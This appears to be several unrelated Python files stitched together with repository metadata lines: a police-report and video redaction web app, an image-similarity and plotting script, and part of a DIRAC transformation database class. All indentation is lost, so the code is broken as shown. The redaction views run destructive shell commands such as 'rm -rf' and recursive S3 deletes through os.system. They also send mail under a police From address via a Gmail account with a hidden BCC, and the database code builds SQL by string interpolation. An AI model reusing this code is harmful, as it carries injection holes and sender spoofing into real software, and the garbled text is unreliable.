redacted_words = []
narrative_words = filter(None, re.split("[ \n]+", narrative))
for word in narrative_words:
if word not in safe_words:
redacted_words.append('<span class="safe">%s</span>' % (word))
redacted_words = sorted(list(set(redacted_words)))
return redacted_words
def remove_punctuation(word):
return word.strip('.?!,":\'\#\(\)\{\}\/;*').replace("'s", '')
def is_recent_date(word): # objective is to ensure birthdays are not released
if not re.search('^\d+[/\-]\d+[/\-]\d+$', remove_punctuation(word)):
return False
try:
from dateutil.parser import parse
import datetime
a = datetime.datetime.now()
b = parse(word)
c = a - b
if c.days < 60:
return True
else:
return False
except:
import sys, traceback
traceback.print_exc(file=sys.stdout)
return False
def is_call_sign(word):
if re.search('^\d+[A-Za-z]+\d+$', word):
return True
elif re.search('^\d\-[A-Za-z]+\-\d+$', word): # e.g. 2-W-11
return True
else:
return False
def is_count(word, next_word):
if re.search('^[\d\.]+$', remove_punctuation(word)) and remove_punctuation(next_word).endswith('s'):
return True
else:
return False
def is_persons_initial(word):
return True if re.search('^[\w]\.$', word) else False
def is_measurement(word):
return re.search('^\d{2}\"$', word)
def is_age(word, next_word):
if re.search('^\d+$', word):
if next_word.startswith('year'):
return True
else:
return False
else:
return False
def is_officer(word, prev_prev_word, prev_word):
abbreviations = ['Officer', 'officer', 'Off.', 'Off','OFC', 'Ofc', 'SGT', 'Sgt', 'LT', 'Lt', 'CPT', 'Cpt', 'Sgt.']
if remove_punctuation(prev_word) in abbreviations or remove_punctuation(prev_prev_word) in abbreviations:
if is_capitalized(word) or re.search('^\#\d+$', remove_punctuation(word)): # Officer #3830
return True
else:
return False
else:
return False
def is_ordinal(word, next_word):
if re.search('^\d+(th|nd|rd)$', remove_punctuation(word.lower())):
return True
elif re.search('^\d+$', word) and remove_punctuation(next_word.lower()) in ['th', 'nd', 'rd']:
return True
else:
return False
def is_street_name(word, prev_word, next_word):
if is_capitalized(word):
t = False
address_initials = ['S', 'S.', 'St.', 'AVE', 'AV', 'Av', 'Alley', 'Al']
if prev_word in address_initials or next_word in address_initials:
return True
else:
return False
elif re.search('^\d+AV$', word):
return True
else:
return False
def is_block(word, next_word):
if re.search('^\d+$', word) and next_word in ['block']:
return True
else:
return False
def is_ssn(word):
if re.search('\d{3}\-\d{2}\-\d{4}', word):
return True
else:
return False
def is_building_number(word, next_word):
if re.search('^\d+$', word) and (is_capitalized(next_word) or re.search('^\dAV$', next_word)):
return True
else:
return False
def is_dollar(word):
if re.search('^\$[\d\.]+$', remove_punctuation(word)):
return True
else:
return False
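# Hedged examples of the helper predicates above (values are illustrative only):
#   is_call_sign('2W11') -> True (digits-letters-digits pattern)
#   is_ordinal('4th', 'Ave') -> True
#   is_dollar('$20.00') -> True
#   is_recent_date('01/01/1990') -> False (more than 60 days old)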
def mark_sentence_words_for_redaction(sentence, safe_words, unsafe_words):
s = []
narrative_words = sentence.split(' ')
next_word = ''
for i, word in enumerate(narrative_words):
next_word = ''
prev_word = ''
prev_prev_word = ''
try:
next_word = narrative_words[i+1]
except:
pass
try:
prev_word = narrative_words[i-1]
except:
pass
try:
prev_prev_word = narrative_words[i-2]
except:
pass
if is_ssn(remove_punctuation(word)):
s.append('<span class="unsafe" title="social security number">XXX</span>-<span class="unsafe" title="social security number">XX</span>-<span class="unsafe" title="social security number">XXXX</span>')
elif is_persons_initial(word): # person's middle initial
s.append('<span class="unsafe">%s</span>.' % (word[0]))
elif is_count(word, next_word):
s.append('<span class="safe">%s</span>' % (word))
elif is_street_name(word, prev_word, next_word):
s.append('<span class="safe">%s</span>' % (word))
elif is_block(word, next_word):
s.append('<span class="safe">%s</span>' % (word))
elif is_building_number(word, next_word):
s.append(word[:-2]+'<span class="unsafe">'+word[-2:]+'</span>')
elif is_officer(word, prev_prev_word, prev_word):
s.append('<span class="safe">%s</span>' % (word))
elif is_measurement(word): # measurement
s.append('<span class="safe">%s</span>' % (word))
elif is_age(word, next_word):
s.append('<span class="safe">%s</span>' % (word))
elif is_ordinal(word, next_word):
s.append('<span class="safe">%s</span>' % (word))
elif re.search('^[A-Z]/[A-Z]$', remove_punctuation(word)):
s.append('<span class="safe">%s</span>' % (word))
elif is_dollar(word):
s.append('<span class="safe">%s</span>' % (word))
elif re.search('^\d{4}$', word) and remove_punctuation(next_word) in ['hours', 'hrs']: # to deal with 1150 hours
s.append('<span class="safe">%s</span>' % (word))
elif re.search("^\w+/[\w']+$", remove_punctuation(word)):
w1, w2 = word.split('/')
if not w1 in safe_words:
w1 = '<span class="unsafe">%s</span>' % (w1)
if not w2 in safe_words:
if w2.endswith("'s"):
w2 = '<span class="unsafe">%s</span>\'s' % (w2[:-2])
else:
#w2 = '<span class="unsafe">%s</span>' % (w2)
w2 = re.sub('[\w\d/\-]+', '<span class="unsafe" title="not in dictionary">%s</span>' % (remove_punctuation(w2)), w2)
s.append('%s/%s' % (w1, w2))
elif re.search('^\w+,\w+$', remove_punctuation(word)):
w1, w2 = word.split(',')
if not w1 in safe_words:
w1 = '<span class="unsafe">%s</span>' % (w1)
if not w2 in safe_words:
#w2 = '<span class="unsafe">%s</span>' % (w2)
w2 = re.sub('[\w\d/\-]+', '<span class="unsafe" title="not in dictionary">%s</span>' % (remove_punctuation(w2)), w2)
s.append('%s,%s' % (w1, w2))
elif i == 0 or re.search('^"[A-Z]', word): # if quote in front of capitalized word like "Pulled a gun on him."
if remove_punctuation(word) not in safe_words and remove_punctuation(word).lower() not in safe_words or remove_punctuation(word) in unsafe_words:
#s.append('<span class="unsafe" title="unsafe first word of sentence">%s</span>' % (word))
if "'s" in word:
s.append(re.sub('[\w\d/\-\:]+', '<span class="unsafe" title="unsafe first word of sentence">%s</span>\'s' % (remove_punctuation(word)), word.replace("'s", '')))
else:
s.append(re.sub('[\w\d\-]+', '<span class="unsafe" title="unsafe first word of sentence">%s</span>' % (remove_punctuation(word)), word))
else:
s.append('<span title="first word of sentence">%s</span>' % (word))
elif re.search('^\d{2}\:\d{2}$', remove_punctuation(word)):
s.append('<span title="time">%s</span>' % (word))
elif is_recent_date(word):
s.append('<span title="is recent date">%s</span>' % (word))
elif is_call_sign(remove_punctuation(word)):
s.append('<span title="call sign">%s</span>' % (word))
else:
if remove_punctuation(word) not in safe_words and not '-' in word:
if "'s" in word:
s.append(re.sub('[\w\d/\-\:]+', '<span class="unsafe" title="not in dictionary">%s</span>\'s' % (remove_punctuation(word)), word.replace("'s", '')))
else:
s.append(re.sub('[\w\d/\-\']+', '<span class="unsafe" title="not in dictionary">%s</span>' % (remove_punctuation(word)), word))
elif '-' in word: # deal with words like anti-harassment order
safe = True
for w in word.split('-'):
if not remove_punctuation(w) in safe_words:
safe = False
if safe:
s.append('<span class="safe">%s</span>' % (word))
else:
s.append(re.sub('[\w\d/\-]+', '<span class="unsafe" title="word with dash">%s</span>' % (remove_punctuation(word)), word))
else:
s.append('<span class="safe">%s</span>' % (word))
return ' '.join(s)
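# Hedged example of the output format, assuming 'the', 'officer' and 'met' are
# in the safe word list and 'Smith' is not:
#   mark_sentence_words_for_redaction('the officer met Smith', safe, unsafe)
# would return (as one space-joined string):
#   <span title="first word of sentence">the</span>
#   <span class="safe">officer</span>
#   <span class="safe">met</span>
#   <span class="unsafe" title="not in dictionary">Smith</span>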
def mark_words_for_redaction(narrative, safe_words, unsafe_words):
print 'start'
if re.search('^[A-Z\d\s,\-\.]+$', narrative):
return '<span title="every letter is capitalized">%s</span>' % (narrative)
import nltk.data
tokenizer = nltk.data.load('tokenizers/punkt/english.pickle')
safe_words = [w.word for w in Word.objects.filter(safe=True)]
s = []
narrative_words = filter(None, re.split("[ \n]+", narrative))
sentences = tokenizer.tokenize(narrative)
print 'done'
return ' '.join([mark_sentence_words_for_redaction(sentence, safe_words, unsafe_words) for sentence in sentences])
@login_required
def mark_word(request, the_type):
safe = True if the_type == 'safe' else False
is_modify = True if request.POST.get('modify') == 'true' else False
if is_modify:
try:
word = Word(word=request.POST['word'], safe=safe)
word.save()
except:
word = Word.objects.get(word=request.POST['word'])
word.safe = True
word.save()
redaction_event = RedactionEvent(report_filename=request.POST['report_filename'], user=request.user, word=request.POST['word'], is_marked=not safe, is_wordlist_modified=is_modify)
redaction_event.save()
return HttpResponse('')
@login_required
def overredact_reports(request):
os.system('mkdir ../reports/')
random_id = get_random_id()
with open('../reports/history.txt', 'a') as historyfile:
historyfile.write('\n'+request.FILES['file'].name+'\n')
f = open('../reports/%s.pdf' % (random_id), 'w')
f.write(request.FILES['file'].read())
f.close()
os.system('pdf2txt.py ../reports/%s.pdf > ../reports/%s.txt' % (random_id, random_id))
#os.system('rm ../reports/%s.pdf' % (random_id))
f = open('../reports/%s.txt' % (random_id))
#os.system('rm ../reports/%s.txt' % (random_id))
preview = f.read()
preview = extract_narrative(preview).strip(']')
redacted_words = get_redacted_words(preview)
paragraphs = preview.split('\n\n')
processed_paragraphs = []
print '# of paragraphs: %s' % (len(paragraphs))
safe_words = [w.word for w in Word.objects.filter(safe=True)]
unsafe_words = [w.word for w in Word.objects.filter(safe=False)]
processed_paragraphs = [mark_words_for_redaction(paragraph, safe_words, unsafe_words) for paragraph in paragraphs]
preview = '\n\n'.join(processed_paragraphs)
processing_log = ProcessingLog(report_filename=request.FILES['file'].name, user=request.user)
processing_log.save()
processing_id = processing_log.id
return HttpResponse(json.dumps({'processing_id': processing_id, 'report_filename': request.FILES['file'].name, 'message': 'File uploaded successfully!', 'preview': preview.replace('\n', '<br/>')}), content_type="application/json")
@login_required
def minimally_redact_video(request):
os.system('rm -rf ../video_for_minimal_redaction/; mkdir ../video_for_minimal_redaction/')
os.system('aws s3 rm s3://spdvideodetectedregions/ --recursive')
os.system('aws s3 rm s3://spdvideoframesin/ --recursive')
random_id = get_random_id()
os.system('mkdir ../video_for_minimal_redaction/%s/' % (random_id))
# save the video
f = open('../video_for_minimal_redaction/%s.mp4' % (random_id), 'w')
f.write(request.FILES['file'].read())
f.close()
# convert the video to frames
os.system('ffmpeg -threads 0 -i ../video_for_minimal_redaction/%s.mp4 -f image2 ../video_for_minimal_redaction/%s/%%05d.png' % (random_id, random_id))
# save to S3
os.system('aws s3 cp ../video_for_minimal_redaction/%s/ s3://spdvideoframesin/%s/ --recursive' % (random_id, random_id))
# give lambda 20 seconds to process all the frames and then copy the detections to local filesystem
import time
time.sleep(20)
os.system('rm media/detected_regions/frames/*')
os.system('cd media/detected_regions/frames/; aws s3 cp s3://spdvideodetectedregions/%s/ . --recursive' % (random_id))
os.system('aws s3 rm s3://spdvideodetectedregions/ --recursive')
os.system('aws s3 rm s3://spdvideoframesin/ --recursive')
return HttpResponse(str(random_id))
@login_required
def email_report(request):
try:
processing_log = ProcessingLog(id=request.POST['processing_id'])
from datetime import datetime
processing_log.stop_time = datetime.now()
processing_log.save()
except:
pass
settings = get_settings()
import smtplib
recipient = request.POST['to']
session = smtplib.SMTP('smtp.gmail.com', 587)
session.ehlo()
session.starttls()
session.login(settings["email_username"], settings["email_password"])
email_subject = "Police report narrative you requested"
body_of_email = request.POST['body']
headers = "\r\n".join(["from: Seattle Police <spdnews@seattle.gov>",
"subject: " + email_subject,
"to: " + request.POST['to'],
"X-Bcc: policevideorequests@gmail.com",
"mime-version: 1.0",
"content-type: text/html"])
# body_of_email can be plaintext or html!
content = headers + "\r\n\r\n" + body_of_email
session.sendmail("timacbackup", request.POST['to'], content)
session.quit()
return HttpResponse('done')
# USAGE
# python compare.py
# import the necessary packages
from skimage.measure import structural_similarity as ssim
import matplotlib.pyplot as plt
import numpy as np
import cv2
def mse(imageA, imageB):
# the 'Mean Squared Error' between the two images is the
# sum of the squared difference between the two images;
# NOTE: the two images must have the same dimension
err = np.sum((imageA.astype("float") - imageB.astype("float")) ** 2)
err /= float(imageA.shape[0] * imageA.shape[1])
# return the MSE, the lower the error, the more "similar"
# the two images are
return err
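# Hedged usage sketch for mse (hypothetical arrays; both inputs must have the
# same shape):
#   a = np.zeros((10, 10))
#   b = np.ones((10, 10))
#   mse(a, b) # -> 1.0 (every pixel differs by 1, squared and averaged)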
#!/usr/bin/env python
"""Compare two aligned images of the same size.
Usage: python compare.py first-image second-image
"""
import sys
from scipy.misc import imread
from scipy.linalg import norm
from scipy import sum, average
def main():
file1, file2 = sys.argv[1:1+2]
# read images as 2D arrays (convert to grayscale for simplicity)
img1 = to_grayscale(imread(file1).astype(float))
img2 = to_grayscale(imread(file2).astype(float))
# compare
n_m, n_0 = compare_images(img1, img2)
print "Manhattan norm:", n_m, "/ per pixel:", n_m/img1.size
print "Zero norm:", n_0, "/ per pixel:", n_0*1.0/img1.size
def compare_images(img1, img2):
# normalize to compensate for exposure difference
img1 = normalize(img1)
img2 = normalize(img2)
# calculate the difference and its norms
diff = img1 - img2 # elementwise for scipy arrays
m_norm = sum(abs(diff)) # Manhattan norm
z_norm = norm(diff.ravel(), 0) # Zero norm
return (m_norm, z_norm)
def to_grayscale(arr):
"If arr is a color image (3D array), convert it to grayscale (2D array)."
if len(arr.shape) == 3:
return average(arr, -1) # average over the last axis (color channels)
else:
return arr
def normalize(arr):
rng = arr.max()-arr.min()
amin = arr.min()
return (arr-amin)*255/rng
def compare(imageA, imageB):
# load the images -- the original, the original + contrast,
# and the original + photoshop
#imageA = cv2.imread(imageA)
#imageB = cv2.imread(imageB)
#imageA = cv2.cvtColor(imageA, cv2.COLOR_BGR2GRAY)
#imageA = cv2.fastNlMeansDenoising(imageA,10,10,7,21)
imageA = cv2.Canny(imageA,100,200)
#imageB = cv2.fastNlMeansDenoisingColored(imageB,None,10,10,7,21)
# convert the images to grayscale
#imageA = cv2.cvtColor(imageA, cv2.COLOR_BGR2GRAY)
#imageB = cv2.cvtColor(imageB, cv2.COLOR_BGR2GRAY)
#imageA = cv2.GaussianBlur(imageA,(3, 3), 30)
#imageB = cv2.GaussianBlur(imageA,(3, 3), 30)
# Make the two images the same size
def get_lowest(A, B):
if A < B:
return A
return B
heightA, widthA = imageA.shape[:2]
#print heightA, widthA
heightB, widthB = imageB.shape[:2]
#print heightB, widthB
height = get_lowest(heightA, heightB)
width = get_lowest(widthA, widthB)
#print height, width
imageA = imageA[0:height, 0: width]
imageB = imageB[0:height, 0: width]
#print "MSE", mse(imageA, imageB)
return ssim(imageA, imageB)
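# Note: compare() returns the structural similarity index (1.0 for identical
# inputs). The arguments are not treated symmetrically -- imageA is reduced to
# a Canny edge map while imageB is used as-is -- which is worth keeping in mind
# when choosing argument order.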
import numpy
from PIL import Image
import cv2
def similarness(image1,image2):
"""
Return the correlation distance between the histograms. This is 'normalized' so that
1 is a perfect match while -1 is a complete mismatch and 0 is no match.
"""
# Open and resize images to 200x200
i1 = Image.open(image1).resize((200,200))
i2 = Image.open(image2).resize((200,200))
# Get histogram and separate into RGB channels
i1hist = numpy.array(i1.histogram()).astype('float32')
i1r, i1b, i1g = i1hist[0:256], i1hist[256:256*2], i1hist[256*2:]
# Re-bin each channel's histogram from 256 bins down to 16 (48 bins in total)
i1rh = numpy.array([sum(i1r[i*16:16*(i+1)]) for i in range(16)]).astype('float32')
i1bh = numpy.array([sum(i1b[i*16:16*(i+1)]) for i in range(16)]).astype('float32')
i1gh = numpy.array([sum(i1g[i*16:16*(i+1)]) for i in range(16)]).astype('float32')
# Combine all the channels back into one array
i1histbin = numpy.ravel([i1rh, i1bh, i1gh]).astype('float32')
# Same steps for the second image
i2hist = numpy.array(i2.histogram()).astype('float32')
i2r, i2b, i2g = i2hist[0:256], i2hist[256:256*2], i2hist[256*2:]
i2rh = numpy.array([sum(i2r[i*16:16*(i+1)]) for i in range(16)]).astype('float32')
i2bh = numpy.array([sum(i2b[i*16:16*(i+1)]) for i in range(16)]).astype('float32')
i2gh = numpy.array([sum(i2g[i*16:16*(i+1)]) for i in range(16)]).astype('float32')
i2histbin = numpy.ravel([i2rh, i2bh, i2gh]).astype('float32')
return cv2.compareHist(i1histbin, i2histbin, 0)
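# Hedged usage sketch (hypothetical file names): similarness returns the
# histogram correlation in [-1, 1]; compare_all_detected_to below keeps
# detections scoring above 0.85.
#   score = similarness('frames/a.png', 'frames/b.png')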
@login_required
def compare_all_detected_to(request, compare_to):
import os
def c(A):
return compare(A, "media/detected_regions/frames/"+compare_to)
detections = os.listdir("media/detected_regions/frames/")
print len(detections)
comparisons = []
#compare_to = cv2.imread("media/detected_regions/frames/" + compare_to)
#compare_to = cv2.cvtColor(compare_to, cv2.COLOR_BGR2GRAY)
#compare_to = cv2.fastNlMeansDenoising(compare_to,10,10,7,21)
#compare_to = cv2.Canny(compare_to,100,200)
for i, imageA in enumerate(detections):
print i
#if i == 1000:
# break
score = similarness("media/detected_regions/frames/" + imageA, "media/detected_regions/frames/" + compare_to)
if score > .85:
comparisons.append((imageA, score))
#comparisons.append((imageA, compare(cv2.imread("media/detected_regions/frames/" + imageA), compare_to)))
return HttpResponse(json.dumps(sorted(comparisons, reverse=True, key=lambda x: x[1])), content_type="application/json")
#return HttpResponse(json.dumps(sorted([(imageA, c("media/detected_regions/frames/" + imageA)) for imageA in detections if c("media/detected_regions/frames/" + imageA) > 0.15], reverse=True, key=lambda x: x[1])), content_type="application/json")
@login_required
def apply_video_redactions(request):
import cv2
videoid = request.POST['videoid']
print request.POST
filenames = json.loads(request.POST['filenames'])
filenames = sorted(list(set(filenames)))
frames = [{'frame': filename[:5], 'filenames': [f for f in filenames if f.startswith(filename[:5])]} for filename in filenames]
for frame in frames:
current = os.getcwd()
basename = frame['frame']
imagePath = os.path.join(current, '../video_for_minimal_redaction/%s/%s' % (videoid, basename+'.png'))
print imagePath
# Read the image
image = cv2.imread(imagePath)
result_image = image.copy()
for filename in frame['filenames']:
pieces = filename.replace('.png', '').split('_')
# Draw a rectangle around the faces
print filename, map(int, pieces[2:])
x, y, w, h = map(int, pieces[2:])
#iteml.append((x, y, w, h))
#cv2.rectangle(image, (x, y), (x+w, y+h), (0, 255, 0), 2)
sub_face = image[y:y+h, x:x+w]
# apply a Gaussian blur on this new rectangle image
sub_face = cv2.GaussianBlur(sub_face,(23, 23), 30)
# merge this blurry rectangle to our final image
result_image[y:y+sub_face.shape[0], x:x+sub_face.shape[1]] = sub_face
cv2.imwrite(os.path.join(current, '../video_for_minimal_redaction/%s/%s' % (videoid, basename+'.png')), result_image)
#cmd = 'ffmpeg -threads 0 -framerate 30/1 -i ../video_for_minimal_redaction/%s/%%05d.png -c:v libx264 -r 30 -pix_fmt yuv420p out.mp4' % (videoid)
os.system('rm media/out.mp4')
cmd = 'ffmpeg -threads 0 -framerate 30/1 -i ../video_for_minimal_redaction/%s/%%05d.png -r 30 -pix_fmt yuv420p media/out.mp4' % (videoid)
print cmd
os.system(cmd)
return HttpResponse('')
@login_required
def get_frames(request):
import os
frames = os.listdir('media/frames/')
return HttpResponse(json.dumps(sorted(frames)), content_type="application/json")
|
policevideorequests/policevideopublisher
|
webinterface/webinterface/views.py
|
Python
|
bsd-3-clause
| 30,481
|
[
"Gaussian"
] |
8cf8ba9c49434e5f3edd340a167077f6c5327e65a0a5eb7b50a8937f66c71029
|
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 5 12:39:59 2017
@author: Shabaka
"""
import os
import glob
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import numpy as np
from scipy import stats
from mayavi import mlab  # needed for the 3D density plot below
import multiprocessing
import plotly.plotly as py
import plotly.graph_objs as go
from plotly.graph_objs import Surface
path = r'C:\Users\Shabaka\Desktop\Test2 DJI_Corretti\100\TIM'
# path = r'C:\DRO\DCL_rawdata_files'
allFiles = glob.glob(path + "/*.csv")
# frame = pd.DataFrame()
list_TIM = []
for file_ in allFiles:
df_TIM = pd.read_csv(file_, index_col=None, header=0)
list_TIM.append(df_TIM)
frame = pd.concat(list_TIM) # ignore_index=True)
print(frame.head())
# sns.heatmap(frame.head())
plt.show()
temp = pd.read_csv('C:\\Users\\Shabaka\\Desktop\\Temperatura_Media.csv')
# Plot the aapl time series in blue
print(temp.head())
plt.plot(temp, color='blue', label='Temp_Median..(yr)')
plt.show()
# Plot the pairwise joint distributions grouped by 'origin' along with
# regression lines
# sns.pairplot(temp, kind='reg', hue='Temp_Med')
# plt.show()
# urb_pop_reader = pd.read_csv(filename, chunksize=1000)
"""
files = glob("*.txt")
fig, ax = plt.subplots()
for f in files:
print("Current file is"+f)
#your csv loading into data
data.plot('time','temp',ax=axes[0])
#outside of the for loop
plt.savefig("myplots.png")
"""
# ''''''''''''3D Density Map Plot ''''''''''#
def calc_kde(data):
return kde(data.T)
mu, sigma = 0, 0.1
x = 10*np.random.normal(mu, sigma, 5000)
y = 10*np.random.normal(mu, sigma, 5000)
z = 10*np.random.normal(mu, sigma, 5000)
xyz = np.vstack([x, y, z])
kde = stats.gaussian_kde(xyz)
# Evaluate kde on a grid
xmin, ymin, zmin = x.min(), y.min(), z.min()
xmax, ymax, zmax = x.max(), y.max(), z.max()
xi, yi, zi = np.mgrid[xmin:xmax:30j, ymin:ymax:30j, zmin:zmax:30j]
coords = np.vstack([item.ravel() for item in [xi, yi, zi]])
# Multiprocessing
cores = multiprocessing.cpu_count()
pool = multiprocessing.Pool(processes=cores)
results = pool.map(calc_kde, np.array_split(coords.T, 2))
density = np.concatenate(results).reshape(xi.shape)
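# Note: calc_kde runs in the worker processes and picks up the module-level
# `kde` object through fork-inherited globals; the two-way np.array_split above
# simply splits the evaluation grid into two chunks. On platforms that spawn
# rather than fork (e.g. Windows), `kde` would need to be passed to the workers
# explicitly.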
# Plot scatter with mayavi
figure = mlab.figure('DensityPlot')
grid = mlab.pipeline.scalar_field(xi, yi, zi, density)
min = density.min()
max = density.max()
mlab.pipeline.volume(grid, vmin=min, vmax=min + .5*(max-min))
mlab.axes()
mlab.show()
# '''''''' Alternative Route'''''''''''''#
filename = 'C:\\Users\\Shabaka\\Desktop\\Temperatura_Media.csv'
raw_data = open(filename, 'rt')
tempdata = pd.read_csv(raw_data, header=0)
print(tempdata.shape)
print(tempdata.head())
plt.plot(tempdata, color='blue', label='Temp_Med')
plt.show()
sns.pairplot(tempdata, kind='reg') # hue='Temp_Med')
plt.show()
surfdata = [go.Surface(tempdata.as_matrix())]
layout = go.Layout(
title='Temp_Data Elevation',
autosize=False,
width=500,
height=500,
margin=dict(
l=65,
r=50,
b=65,
t=90
)
)
fig = go.Figure(data=surfdata, layout=layout)
py.iplot(fig, filename='elevations-3d-surface', type='surface')
plt.show()
|
qalhata/Python-Scripts-Repo-on-Data-Science
|
CSV_Concatenate_All.py
|
Python
|
gpl-3.0
| 3,117
|
[
"Mayavi"
] |
d24edd83a598a0e2f7d6291e2a031f6ad1ee0bfbb36fe4e7333f4a829ec8a167
|
""" DIRAC Transformation DB
Transformation database is used to collect and serve the necessary information
in order to automate the task of job preparation for high level transformations.
This class is typically used as a base class for more specific data processing
databases
"""
import re, time, threading, copy
from types import IntType, LongType, StringTypes, StringType, ListType, TupleType, DictType
from DIRAC import gLogger, S_OK, S_ERROR
from DIRAC.Core.Base.DB import DB
from DIRAC.Resources.Catalog.FileCatalog import FileCatalog
from DIRAC.Core.Security.ProxyInfo import getProxyInfo
from DIRAC.Core.Utilities.List import stringListToString, intListToString, breakListIntoChunks
from DIRAC.Core.Utilities.Shifter import setupShifterProxyInEnv
from DIRAC.ConfigurationSystem.Client.Helpers.Operations import Operations
from DIRAC.Core.Utilities.Subprocess import pythonCall
__RCSID__ = "$Id$"
MAX_ERROR_COUNT = 10
#############################################################################
class TransformationDB( DB ):
""" TransformationDB class
"""
def __init__( self, dbname = None, dbconfig = None, maxQueueSize = 10, dbIn = None ):
""" The standard constructor takes the database name (dbname) and the name of the
configuration section (dbconfig)
"""
if not dbname:
dbname = 'TransformationDB'
if not dbconfig:
dbconfig = 'Transformation/TransformationDB'
if not dbIn:
DB.__init__( self, dbname, dbconfig, maxQueueSize )
self.lock = threading.Lock()
self.filters = ()
res = self.__updateFilters()
if not res['OK']:
gLogger.fatal( "Failed to create filters" )
self.allowedStatusForTasks = ( 'Unused', 'ProbInFC' )
self.TRANSPARAMS = [ 'TransformationID',
'TransformationName',
'Description',
'LongDescription',
'CreationDate',
'LastUpdate',
'AuthorDN',
'AuthorGroup',
'Type',
'Plugin',
'AgentType',
'Status',
'FileMask',
'TransformationGroup',
'GroupSize',
'InheritedFrom',
'Body',
'MaxNumberOfTasks',
'EventsPerTask',
'TransformationFamily']
self.mutable = [ 'TransformationName',
'Description',
'LongDescription',
'AgentType',
'Status',
'MaxNumberOfTasks',
'TransformationFamily',
'Body'] # for the moment include TransformationFamily
self.TRANSFILEPARAMS = ['TransformationID',
'FileID',
'Status',
'TaskID',
'TargetSE',
'UsedSE',
'ErrorCount',
'LastUpdate',
'InsertedTime']
self.TRANSFILETASKPARAMS = ['TransformationID',
'FileID',
'TaskID']
self.TASKSPARAMS = [ 'TaskID',
'TransformationID',
'ExternalStatus',
'ExternalID',
'TargetSE',
'CreationTime',
'LastUpdateTime']
self.ADDITIONALPARAMETERS = ['TransformationID',
'ParameterName',
'ParameterValue',
'ParameterType'
]
# This is here to ensure full compatibility between different versions of the MySQL DB schema
self.isTransformationTasksInnoDB = True
res = self._query( "SELECT Engine FROM INFORMATION_SCHEMA.TABLES WHERE table_name = 'TransformationTasks'" )
if not res['OK']:
raise RuntimeError, res['Message']
else:
engine = res['Value'][0][0]
if engine.lower() != 'innodb':
self.isTransformationTasksInnoDB = False
def getName( self ):
""" Get the database name
"""
return self.dbName
###########################################################################
#
# These methods manipulate the Transformations table
#
def addTransformation( self, transName, description, longDescription, authorDN, authorGroup, transType,
plugin, agentType, fileMask,
transformationGroup = 'General',
groupSize = 1,
inheritedFrom = 0,
body = '',
maxTasks = 0,
eventsPerTask = 0,
addFiles = True,
connection = False ):
""" Add new transformation definition including its input streams
"""
connection = self.__getConnection( connection )
res = self._getTransformationID( transName, connection = connection )
if res['OK']:
return S_ERROR( "Transformation with name %s already exists with TransformationID = %d" % ( transName,
res['Value'] ) )
elif res['Message'] != "Transformation does not exist":
return res
self.lock.acquire()
res = self._escapeString( body )
if not res['OK']:
return S_ERROR( "Failed to parse the transformation body" )
body = res['Value']
req = "INSERT INTO Transformations (TransformationName,Description,LongDescription, \
CreationDate,LastUpdate,AuthorDN,AuthorGroup,Type,Plugin,AgentType,\
FileMask,Status,TransformationGroup,GroupSize,\
InheritedFrom,Body,MaxNumberOfTasks,EventsPerTask)\
VALUES ('%s','%s','%s',\
UTC_TIMESTAMP(),UTC_TIMESTAMP(),'%s','%s','%s','%s','%s',\
'%s','New','%s',%d,\
%d,%s,%d,%d);" % \
( transName, description, longDescription,
authorDN, authorGroup, transType, plugin, agentType,
fileMask, transformationGroup, groupSize,
inheritedFrom, body, maxTasks, eventsPerTask )
res = self._update( req, connection )
if not res['OK']:
self.lock.release()
return res
transID = res['lastRowId']
self.lock.release()
# If the transformation has an input data specification
if fileMask:
self.filters.append( ( transID, re.compile( fileMask ) ) )
if inheritedFrom:
res = self._getTransformationID( inheritedFrom, connection = connection )
if not res['OK']:
gLogger.error( "Failed to get ID for parent transformation: %s, now deleting" % res['Message'] )
return self.deleteTransformation( transID, connection = connection )
originalID = res['Value']
# FIXME: this is not the right place to change status information, and in general the whole should not be here
res = self.setTransformationParameter( originalID, 'Status', 'Completing',
author = authorDN, connection = connection )
if not res['OK']:
gLogger.error( "Failed to update parent transformation status: %s, now deleting" % res['Message'] )
return self.deleteTransformation( transID, connection = connection )
message = 'Creation of the derived transformation (%d)' % transID
self.__updateTransformationLogging( originalID, message, authorDN, connection = connection )
res = self.getTransformationFiles( condDict = {'TransformationID':originalID}, connection = connection )
if not res['OK']:
gLogger.error( "Could not get transformation files: %s, now deleting" % res['Message'] )
return self.deleteTransformation( transID, connection = connection )
if res['Records']:
res = self.__insertExistingTransformationFiles( transID, res['Records'], connection = connection )
if not res['OK']:
gLogger.error( "Could not insert files: %s, now deleting" % res['Message'] )
return self.deleteTransformation( transID, connection = connection )
if addFiles and fileMask:
self.__addExistingFiles( transID, connection = connection )
message = "Created transformation %d" % transID
self.__updateTransformationLogging( transID, message, authorDN, connection = connection )
return S_OK( transID )
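  # Illustrative usage sketch (the instance name and all argument values below are hypothetical):
  #   res = transDB.addTransformation( 'Repro_2016', 'short desc', 'long desc', authorDN,
  #                                    authorGroup, 'DataReprocessing', 'Standard', 'Manual',
  #                                    '/lhcb/data/.*\.raw' )
  #   if res['OK']: transID = res['Value']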
def getTransformations( self, condDict = {}, older = None, newer = None, timeStamp = 'LastUpdate',
orderAttribute = None, limit = None, extraParams = False, offset = None, connection = False ):
""" Get parameters of all the Transformations with support for the web standard structure """
connection = self.__getConnection( connection )
req = "SELECT %s FROM Transformations %s" % ( intListToString( self.TRANSPARAMS ),
self.buildCondition( condDict, older, newer, timeStamp,
orderAttribute, limit, offset = offset ) )
res = self._query( req, connection )
if not res['OK']:
return res
webList = []
resultList = []
for row in res['Value']:
# Prepare the structure for the web
rList = []
transDict = {}
count = 0
for item in row:
transDict[self.TRANSPARAMS[count]] = item
count += 1
if type( item ) not in [IntType, LongType]:
rList.append( str( item ) )
else:
rList.append( item )
webList.append( rList )
if extraParams:
res = self.__getAdditionalParameters( transDict['TransformationID'], connection = connection )
if not res['OK']:
return res
transDict.update( res['Value'] )
resultList.append( transDict )
result = S_OK( resultList )
result['Records'] = webList
result['ParameterNames'] = copy.copy( self.TRANSPARAMS )
return result
def getTransformation( self, transName, extraParams = False, connection = False ):
"""Get Transformation definition and parameters of Transformation identified by TransformationID
"""
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
res = self.getTransformations( condDict = {'TransformationID':transID}, extraParams = extraParams,
connection = connection )
if not res['OK']:
return res
if not res['Value']:
return S_ERROR( "Transformation %s did not exist" % transName )
return S_OK( res['Value'][0] )
